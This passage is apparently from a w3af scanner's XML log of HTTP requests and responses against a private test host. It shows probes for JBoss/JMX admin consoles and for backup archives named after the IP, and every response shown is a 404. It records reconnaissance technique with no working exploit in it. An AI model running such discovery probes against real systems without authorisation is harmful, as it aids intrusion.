                <http-request>
                    <status>GET http://10.12.68.43:31337/admin-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="205">
                <http-request>
                    <status>GET http://10.12.68.43:31337/jmx-console/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="206">
                <http-request>
                    <status>GET http://10.12.68.43:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="207">
                <http-request>
                    <status>GET http://10.12.68.43:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="209">
                <http-request>
                    <status>GET http://10.12.68.43:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="210">
                <http-request>
                    <status>GET http://10.12.68.43:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="211">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="212">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="214">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="215">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="216">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="217">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="218">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="219">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="220">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="221">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="222">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="223">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="224">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="225">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="228">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="229">
                <http-request>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
